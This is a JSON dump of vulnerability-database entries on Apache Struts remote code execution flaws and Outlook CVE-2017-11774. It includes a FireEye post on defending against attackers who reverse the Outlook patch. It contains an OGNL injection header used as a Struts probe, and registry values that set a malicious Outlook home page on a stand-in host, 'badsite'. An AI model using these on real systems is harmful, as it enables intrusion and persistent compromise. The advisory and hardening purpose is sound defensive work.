{\r\n\t exists(ToObjectDeserializer des |\r\n\t des.getParameter(0).getAnAccess() = this\r\n\t )\r\n\t }\r\n\t}\r\n\r\nIntuitively, this definition says that any access to the first parameter of a toObject method, as captured by ToObjectDeserializer above, is a flow source. Note that for technical reasons, flow sources have to be expressions. 
Therefore, we identify all accesses of that parameter (which are expressions) as sources, rather than the parameter itself (which isn't).\r\n\r\nNow that we have the definition for a dataflow source, we can look for places where this tainted data is used in an unsafe deserialization method. We don't have to define that method (the sink) ourselves as it is already in the Deserialization of user-controlled data query (line 64: UnsafeDeserializationSink, we will need to copy its definition into the query console). Using this, our final query becomes:\r\n\r\n\tfrom ContentTypeHandlerInput source, UnsafeDeserializationSink sink\r\n\twhere source.flowsTo(sink)\r\n\tselect source, sink\r\n\r\nHere we use the .flowsTo predicate in FlowSource for tracking so that we only identify the cases when unsafe deserialization is performed on a ContentTypeHandlerInput source.\r\n\r\nWhen I ran the customized query on Struts there was exactly one result (Running it now will yield no result as the fix has been applied). I verified that it was a genuine remote code execution vulnerability before reporting it to the Struts security team. They have been very quick and responsive in working out a solution even though it is a fairly non-trivial task that requires API changes. Due to the severity of this finding I will not disclose more details at this stage. Rather, I will update this blog post in a couple of weeks' time with more information.\r\n# Vendor Response #\r\n\r\n 17 July 2017: Initial disclosure.\r\n 02 August 2017: API changes in preparation for patch.\r\n 14 August 2017: Patch from Struts for review.\r\n 16 August 2017: Vulnerability officially recognized as CVE-2017-9805\r\n 5 September 2017: Struts version 2.5.13 released\r\n\r\n# Mitigate unsafe deserialization risk with lgtm #\r\n\r\nlgtm runs the standard Deserialization of user-controlled data query on all Java projects. 
If your project uses deserialization frameworks detected by that query, and has user-controlled data reaching a deserialization method, you may see relevant alerts for this query on lgtm.com. Check any results carefully. You can also enable lgtm's pull request integration to prevent serious security issues like these from being merged into the code base in the first place.\r\n\r\nIf your project uses other deserialization frameworks, then you can use the query console to create your own custom version of the standard query.", "cvss3": {}, "published": "2017-09-06T00:00:00", "type": "seebug", "title": "Apache Struts2 S2-052 (CVE-2017-9805)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-9805"], "modified": "2017-09-06T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-96420", "id": "SSV:96420", "sourceData": "", "sourceHref": "", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-11-19T12:05:43", "description": "It is possible to perform an RCE attack with a malicious Content-Disposition value or with an improper Content-Length header. If the Content-Disposition / Content-Length value is not valid, an exception is thrown which is then used to display an error message to a user. 
This is a different vector for the same vulnerability described in [S2-045](https://cwiki.apache.org/confluence/display/WW/S2-045) (CVE-2017-5638).", "cvss3": {}, "published": "2017-03-21T00:00:00", "type": "seebug", "title": "S2-046: Struts 2 Remote Code Execution vulnerability\uff08CVE-2017-5638\uff09", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2017-03-21T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-92804", "id": "SSV:92804", "sourceData": "", "sourceHref": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T12:01:16", "description": "Based on the Jakarta plugin Struts remote code execution vulnerability, a malicious user can upload a file by modifying the HTTP request header Content-Type value to trigger the vulnerability, and then execute system commands.\n\nDetection method: send an HTTP request to the server with the Content-Type field modified to: `Content-Type:%{#context['com. opensymphony. xwork2. dispatcher. HttpServletResponse']. addHeader('vul','vul')}. 
multipart/form-data`\n\nIf the returned response contains a `vul` header field, the vulnerability is present.\n", "cvss3": {}, "published": "2017-03-06T00:00:00", "type": "seebug", "title": "S2-045: Struts 2 Remote Code Execution vulnerability\uff08CVE-2017-5638\uff09", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2017-03-06T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-92746", "id": "SSV:92746", "sourceData": "", "sourceHref": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "attackerkb": [{"lastseen": "2023-09-21T12:35:55", "description": "Microsoft Outlook 2010 SP2, Outlook 2013 SP1 and RT SP1, and Outlook 2016 allow an attacker to execute arbitrary commands, due to how Microsoft Office handles objects in memory, aka \u201cMicrosoft Outlook Security Feature Bypass Vulnerability.\u201d\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-10-13T00:00:00", "type": "attackerkb", "title": "CVE-2017-11774", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", 
"authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11774"], "modified": "2021-07-27T00:00:00", "id": "AKB:0BE9878D-891A-4133-B0C0-C05BF85E129C", "href": "https://attackerkb.com/topics/3NZBasLq6g/cve-2017-11774", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-08-12T02:25:06", "description": "The REST Plugin in Apache Struts 2.1.1 through 2.3.x before 2.3.34 and 2.5.x before 2.5.13 uses an XStreamHandler with an instance of XStream for deserialization without any type filtering, which can lead to Remote Code Execution when deserializing XML payloads.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-09-15T00:00:00", "type": "attackerkb", "title": "CVE-2017-9805", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-9805"], "modified": "2020-07-30T00:00:00", "id": "AKB:195A97E5-45A3-4A70-95E4-60FF9B5AD20D", "href": "https://attackerkb.com/topics/PH3MIA0Byl/cve-2017-9805", "cvss": {"score": 6.8, "vector": 
"AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-23T17:24:09", "description": "The Jakarta Multipart parser in Apache Struts 2 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 has incorrect exception handling and error-message generation during file-upload attempts, which allows remote attackers to execute arbitrary commands via a crafted Content-Type, Content-Disposition, or Content-Length HTTP header, as exploited in the wild in March 2017 with a Content-Type header containing a #cmd= string.\n\n \n**Recent assessments:** \n \n**wvu-r7** at September 03, 2020 4:29pm UTC reported:\n\nThis popped Equifax. Vulnerable versions of Struts are exploitable out of the box, since this was a parser flaw. Make sure this is patched!\n\n**hrbrmstr** at May 12, 2020 7:45pm UTC reported:\n\nThis popped Equifax. Vulnerable versions of Struts are exploitable out of the box, since this was a parser flaw. Make sure this is patched!\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2017-03-11T00:00:00", "type": "attackerkb", "title": "CVE-2017-5638", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 
10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2020-07-30T00:00:00", "id": "AKB:BDF59C15-D64F-45D5-B1AC-D1B9DD354080", "href": "https://attackerkb.com/topics/1MWtVe9P7w/cve-2017-5638", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-18T08:32:26", "description": "The Struts 1 plugin in Apache Struts 2.1.x and 2.3.x might allow remote code execution via a malicious field value passed in a raw message to the ActionMessage.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-07-10T00:00:00", "type": "attackerkb", "title": "CVE-2017-9791", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-9791", "CVE-2017-9805"], "modified": "2020-09-02T00:00:00", "id": "AKB:4D7DB359-066E-4E56-AFBB-FA98BF564F13", "href": "https://attackerkb.com/topics/rjpuGwbz6x/cve-2017-9791", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-23T17:28:07", "description": "Apache Struts 2.0.0 to 2.5.20 forced double OGNL 
evaluation, when evaluated on raw user input in tag attributes, may lead to remote code execution.\n\n \n**Recent assessments:** \n \n**wvu-r7** at September 03, 2020 4:30pm UTC reported:\n\nUnlike [CVE-2017-5638](<https://attackerkb.com/topics/1MWtVe9P7w/cve-2017-5638>), which was exploitable out of the box, since it targeted Struts\u2019 Jakarta multipart parser, this vulnerability requires a certain set of circumstances to be true in order for Struts to be exploitable. Since Struts is a web application framework, this will depend entirely on the application the developers have created.\n\n**I don\u2019t know how common this particular scenario is.** Please read the [security bulletin](<https://cwiki.apache.org/confluence/display/WW/S2-059>) for more information. However, what I do know is that this CVE falls somewhere after [CVE-2017-5638](<https://attackerkb.com/topics/1MWtVe9P7w/cve-2017-5638>) and [CVE-2018-11776](<https://attackerkb.com/topics/jgIUjIdFUR/cve-2018-11776>) on the exploitability scale, from most exploitable to least: a parser flaw, a configuration flaw, and a programming flaw.\n\nSo, definitely patch this, but also follow Struts development best practices, including those outlined in their security bulletins. 
No measure of mitigations will protect you from poorly written code.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 2\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-14T00:00:00", "type": "attackerkb", "title": "CVE-2019-0230", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638", "CVE-2018-11776", "CVE-2019-0230"], "modified": "2020-11-17T00:00:00", "id": "AKB:289DC3CE-ED8A-4366-89F0-46E148584C36", "href": "https://attackerkb.com/topics/mcp2xl4Va9/cve-2019-0230", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cisa_kev": [{"lastseen": "2023-09-21T10:20:16", "description": "Microsoft Office Outlook contains a security feature bypass vulnerability due to improperly handling objects in memory. 
Successful exploitation allows an attacker to execute commands.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Microsoft Office Outlook Security Feature Bypass Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11774"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2017-11774", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-07-21T17:22:44", "description": "Apache Struts Jakarta Multipart parser allows for malicious file upload using the Content-Type value, leading to remote code execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": 
"2021-11-03T00:00:00", "type": "cisa_kev", "title": "Apache Struts Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2017-5638", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-07-21T17:22:44", "description": "Apache Struts REST Plugin uses an XStreamHandler with an instance of XStream for deserialization without any type filtering, which can lead to remote code execution when deserializing XML payloads.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Apache Struts Deserialization of Untrusted Data Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, 
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-9805"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2017-9805", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "fireeye": [{"lastseen": "2021-10-11T21:15:27", "description": "Attackers have a dirty little secret that is being used to conduct big intrusions. We\u2019ll explain how they're \"unpatching\" an exploit and then provide new Outlook hardening guidance that is not available elsewhere. Specifically, this blog post covers field-tested automated registry processing for registry keys to protect against attacker attempts to reverse Microsoft\u2019s [CVE-2017-11774](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-11774>) patch functionality.\n\nDespite multiple [warnings](<https://twitter.com/ItsReallyNick/status/1014522001900306433>) [from FireEye](<https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s03-youve-got-mail.pdf>) and [U.S. Cyber Command](<https://twitter.com/CNMF_VirusAlert/status/1146130046127681536>), we have continued to observe an uptick in successful exploitation of CVE-2017-11774, a client-side Outlook attack that involves modifying victims\u2019 Outlook client homepages for code execution and persistence. The Outlook Home Page feature allows for customization of the default view for any folder in Outlook. This configuration can allow for a specific URL to be loaded and displayed whenever a folder is opened. This URL is retrieved either via HTTP or HTTPS - and can reference either an internal or external network location. 
When Outlook loads the remote URL, it will render the contents using the Windows DLL _ieframe.dll_, which can allow an attacker to achieve remote code execution that persists through system restarts.\n\nWe have observed multiple threat actors adopting the technique and eventually becoming a favorite for Iranian groups in support of both espionage and reportedly destructive attacks. FireEye first observed APT34 use CVE-2017-11774 in June 2018, followed by adoption by APT33 for a significantly broader campaign beginning in July 2018 and continuing for at least a year. To further increase awareness of this intrusion vector, our [Advanced Practices team worked with MITRE](<https://twitter.com/ItsReallyNick/status/1123285710491070464>) to [update the ATT&CK framework](<https://attack.mitre.org/resources/updates/updates-april-2019/index.html>) to include CVE-2017-11774 home page persistence within [technique T1137 \u2013 \u201cOffice Application Startup\u201d](<https://attack.mitre.org/techniques/T1137/>).\n\nFor more information on how CVE-2017-11774 exploitation works, how APT33 implemented it alongside password spraying, and some common pitfalls for incident responders analyzing this home page technique, see the \u201cRULER In-The-Wild\u201d section of our December 2018 OVERRULED blog post.\n\n#### Going Through a Rough Patch\n\nOn October 10, 2017, [Microsoft released patches](<https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-outlook-2016-october-10-2017-4b7cbd2d-d6a8-6113-cca5-4040278a7df9>) for Microsoft Outlook to protect against this technique.\n\n * KB4011196 (Outlook 2010)\n * KB4011178 (Outlook 2013)\n * KB4011162 (Outlook 2016)\n\nFollowing the mid-2018 abuse by Iranian threat actors first detailed in our OVERRULED blog post, the FireEye Mandiant team began to raise awareness of how the patch could be subverted. 
Doug Bienstock discussed in December 2018 the simple rollback of the patch as a part of Mandiant\u2019s Red Team operations \u2013 [and alluded to observing authorized software that also automatically removes the patch functionality](<https://twitter.com/doughsec/status/1076222018369081345>). In response to U.S. Cyber Command\u2019s mid-2019 warning about APT33\u2019s use of the exploit, we [raised concern with DarkReading](<https://www.darkreading.com/attacks-breaches/us-military-warns-companies-to-look-out-for-iranian-outlook-exploits>) over the ability to override the CVE-2017-11774 patch without escalated privileges.\n\nWithout continuous reinforcement of the recommended registry settings for CVE-2017-11774 hardening detailed within this blog post, an attacker can add or revert registry keys for settings that essentially disable the protections provided by the patches.\n\nAn attacker can set a home page to achieve code execution and persistence by editing the WebView registry keys. The \u201cURL\u201d subkey will enable and set a home page for the specified mail folder within the default mailbox. Setting this registry key to a valid URL enables the home page regardless of whether the patch has been applied. Although the option will not be accessible from the Outlook user interface (UI), it will still be set and render. Importantly, these keys are set within the logged-on user\u2019s Registry hive. This means that no special privileges are required to edit the Registry and roll back the patch. The FireEye Red Team found that no other registry modifications were required to set a malicious Outlook homepage.\n\nHKEY_CURRENT_USER\\Software\\Microsoft\\Office\\<Outlook Version>\\Outlook\\WebView\\Inbox \n\u201cURL\u201d= http://badsite/homepage-persist.html \n--- \n \nThere are additional keys within the Registry that can be modified to further roll back the patch and expose unsafe options in Outlook. 
The following setting can be used to re-enable the original home page tab and roaming home page behavior in the Outlook UI.\n\nHKEY_CURRENT_USER\\Software\\Microsoft\\Office\\<Outlook Version>\\Outlook\\Security \n\u201cEnableRoamingFolderHomepages\u201d= dword:00000001 \n--- \n \nThe following setting will allow for folders within secondary (non-default) mailboxes to leverage a custom home page.\n\nHKEY_CURRENT_USER\\Software\\Microsoft\\Office\\<Outlook Version>\\Outlook\\Security \n\u201cNonDefaultStoreScript\"= dword:00000001 \n--- \n \nThe following setting will allow for \u201cRun as a Script\u201d and \u201cStart Application\u201d rules to be re-enabled.\n\nHKEY_CURRENT_USER\\Software\\Microsoft\\Office\\<Outlook Version>\\Outlook\\Security \n\u201cEnableUnsafeClientMailRules\"= dword:00000001 \n--- \n \nEtienne Stalmans, a developer of [SensePost\u2019s RULER](<https://github.com/sensepost/ruler>) and the credited responsible discloser of CVE-2017-11774, [chimed in](<https://twitter.com/_staaldraad/status/1082604336574808065>) about similar concerns on the patch that were re-raised after seeing a [September 2018 blog post about applying the same technique to Outlook Today\u2019s home page](<https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943>) that is stored at HKCU\\Software\\Microsoft\\Office\\<Outlook Version>\\Outlook\\Today\\UserDefinedUrl. Both Etienne and the September 2018 blog post\u2019s author describe what Microsoft has suggested as a key mitigating factor \u2013 that the exploit and rolling back the patch require some form of initial access. 
This is consistent with Microsoft\u2019s position and [their 2007 immutable laws of security blog](<https://docs.microsoft.com/en-us/archive/blogs/seanearp/immutable-laws-of-security>), which were reiterated when we contacted MSRC prior to publishing this blog post.\n\nWe agree that for the CVE-2017-11774 patch override vector to be successful, a bad guy has to persuade you to run his program (law #1) and alter your operating system (law #2). However, the technique is under-reported, no public mitigation guidance is available, and \u2013 as a fresh in-the-wild example demonstrates in this post \u2013 that initial access and patch overriding can be completely automated.\n\n#### A Cavalier Handling of CVE-2017-11774\n\nThe [Advanced Practices team](<https://twitter.com/ItsReallyNick/lists/fireeye-apt>) monitors for novel implementations of attacker techniques including this patch override, and on November 23, 2019 a uniquely automated phishing document was uploaded to VirusTotal. The sample, \u201cTARA Pipeline.xlsm\u201d (MD5: ddbc153e4e63f7b8b6f7aa10a8fad514), launches malicious Excel macros combining several techniques, including:\n\n * execution guardrails to only launch on the victim domain (client redacted in screenshot)\n * custom pipe-delimited character substitution obfuscation\n * a creative implementation of CVE-2017-11774 using the lesser-known HKCU\\Software\\Microsoft\\Office\\<Outlook Version>\\Outlook\\WebView\\Calendar\\URL registry key\n * a URL pointing to the payload [hosted in Azure storage blobs](<https://docs.microsoft.com/en-us/azure/storage/blobs/storage-blob-static-website>) (*.web.core.windows.net) \u2013 a creative technique that allows an attacker-controlled, swappable payload to be hosted in a legitimate service\n * and most importantly for this blog post \u2013 a function to walk through the registry and reverse the CVE-2017-11774 patch functionality for any version of Microsoft Outlook\n\nThese features of the malicious spear phishing 
Excel macro can be seen in Figure 1.\n\n\n\n \nFigure 1: Malicious macros automatically reverting the CVE-2017-11774 patch\n\nPay special attention to the forced setting of EnableRoamingFolderHomepages to \u201c1\u201d and the setup of \u201cCalendar\\URL\u201d key to point to an attacker-controlled payload, effectively disabling the CVE-2017-11774 patch on initial infection.\n\nIn support of Managed Defense, our Advanced Practices team clusters and tactically attributes targeted threat activity \u2013 whether the intrusion operators turn out to be authorized or unauthorized \u2013 in order to prioritize and deconflict intrusions. In this case, Nick Carr attributed this sample to an uncategorized cluster of activity associated with authorized red teaming, UNC1194 , but you might know them better as the [TrustedSec](<https://twitter.com/TrustedSec>) red team whose founder, [Dave Kennedy, appeared on a previous episode of State of the Hack](<https://www.youtube.com/watch?v=eaTBHWtDaF0>). This malicious Excel file appears to be a weaponized version of a legitimate victim-created document that we also obtained \u2013 reflecting a technique becoming more common with both authorized and unauthorized intrusion operators. For further analysis and screenshots of UNC1194\u2019s next stage CVE-2017-11774 payload for initial reconnaissance, target logging visibility checks, and domain-fronted Azure command and control \u2013 [see here](<https://twitter.com/ItsReallyNick/status/1199209513137688576>). 
Readers should take note that the automated patch removal and home page exploitation establishes attacker-controlled remote code execution and allows these [thankfully authorized] attackers to conduct a full intrusion by swapping out their payload remotely for all follow-on activity.\n\n#### Locking Down the Registry Keys Using Group Policy Object (GPO) Enforcement\n\nAs established, the patches for CVE-2017-11774 can be effectively \u201cdisabled\u201d by modifying registry keys on an endpoint with no special privileges. The following registry keys and values should be configured via Group Policy to reinforce the recommended configurations in the event that an attacker attempts to reverse the intended security configuration on an endpoint to allow for Outlook home page persistence for malicious purposes.\n\nTo protect against an attacker using Outlook\u2019s WebView functionality to configure home page persistence, the following registry key configuration should be enforced.\n\nHKEY_CURRENT_USER\\Software\\Microsoft\\Office\\<Outlook Version>\\Outlook\\WebView \n\"Disable\"= dword:00000001 \n--- \n \nNote: Prior to enforcing this hardening method for all endpoints, the previous setting should be tested on a sampling of endpoints to ensure compatibility with third-party applications that may leverage webviews.\n\nTo enforce the expected hardened configuration of the registry key using a GPO, the following setting can be configured.\n\n * User Configuration > Preferences > Windows Settings > Registry \n * New > Registry Item \n * Action: Update\n * Hive: HKEY_CURRENT_USER\n * Key Path: Software\\Microsoft\\Office\\<Outlook Version>\\Outlook\\Webview \n * Value Name: Disable\n * Value Type: REG_DWORD\n * Value Data: 00000001\n\n\n\n \nFigure 2: Disabling WebView registry setting\n\nIncluded within the [Microsoft Office Administrative Templates](<https://www.microsoft.com/en-us/download/details.aspx?id=49030>), a GPO setting is available which can be configured to 
disable a home page URL from being set in folder properties for all default folders, or for each folder individually. If set to \u201cEnabled\u201d, the following GPO setting essentially enforces the same registry configuration (disabling WebView) as previously noted.\n\nUser Configuration > Policies > Administrative Templates > Microsoft Outlook <version> > Folder Home Pages for Outlook Special Folders > Do not allow Home Page URL to be set in folder Properties \n--- \n \nThe registry key configuration to disable setting an Outlook home page via the Outlook UI is as follows.\n\nHKEY_CURRENT_USER\\Software\\Microsoft\\Office\\<Outlook Version>\\Outlook\\Security \n\"EnableRoamingFolderHomepages\"= dword:00000000 \n--- \n \nTo enforce the expected hardened configuration of the registry key using a GPO, the following setting can be configured.\n\n * User Configuration > Preferences > Windows Settings > Registry \n * New > Registry Item \n * Action: Update\n * Hive: HKEY_CURRENT_USER\n * Key Path: Software\\Microsoft\\Office\\<Outlook Version>\\Outlook\\Security \n * Value Name: EnableRoamingFolderHomepages\n * Value Type: REG_DWORD\n * Value Data: 00000000\n\n\n\n \nFigure 3: EnableRoamingFolderHomepages registry setting\n\nAdditionally, a home page in Outlook can be configured for folders in a non-default datastore. This functionality is disabled once the patch has been installed, but it can be re-enabled by an attacker. 
